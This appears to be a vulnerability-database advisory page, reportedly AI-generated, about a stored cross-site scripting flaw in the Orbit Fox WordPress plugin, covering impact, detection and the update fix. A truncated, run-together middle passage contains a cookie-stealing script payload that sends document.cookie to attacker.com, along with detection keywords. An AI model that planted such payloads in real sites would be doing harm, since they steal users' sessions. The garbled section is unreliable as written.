
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-65563 is a stored Cross-Site Scripting (XSS) vulnerability in the Orbit Fox by ThemeIsle WordPress plugin (also known as themeisle-companion) affecting versions 3.0.7 and earlier. The vulnerability allows an authenticated user with high-level (Author-level) privileges to inject malicious JavaScript that executes in the browsers of other users. It was published on July 27, 2026, with a patch made available the same day. The CVSS v3.1 base score is 5.9 (Medium) (GitHub Advisory, Feedly).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant. An authenticated attacker with Author-level privileges can inject malicious script content into fields processed by the plugin, which is then rendered unsanitized in other users' browsers. Exploitation requires user interaction (i.e., a victim must view the affected content), and the scope is changed, meaning the injected script can affect resources beyond the vulnerable component itself (GitHub Advisory, Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browser sessions, enabling session token theft, credential harvesting, unauthorized actions performed on behalf of victims, or content defacement. Because the scope is changed, the injected script can affect resources outside the plugin's direct security boundary. Confidentiality, integrity, and availability are all assessed as low impact individually, but the combined effect on affected WordPress sites — particularly those with sensitive user data — can be significant (GitHub Advisory, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script> or an event-handler-based variant into the vulnerable field and save/publish the content.<script>, %3Cscript%3E, javascript:, onerror=, onload=).wp_postmeta, wp_options) containing JavaScript payloads.Update the Orbit Fox by ThemeIsle WordPress plugin to a version later than 3.0.7, which contains the fix released on July 27, 2026. As a compensating control, implement a Content Security Policy (CSP) header on the WordPress site to restrict inline script execution. Additionally, audit and limit the number of accounts with Author-level or higher privileges to reduce the attack surface (GitHub Advisory, Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."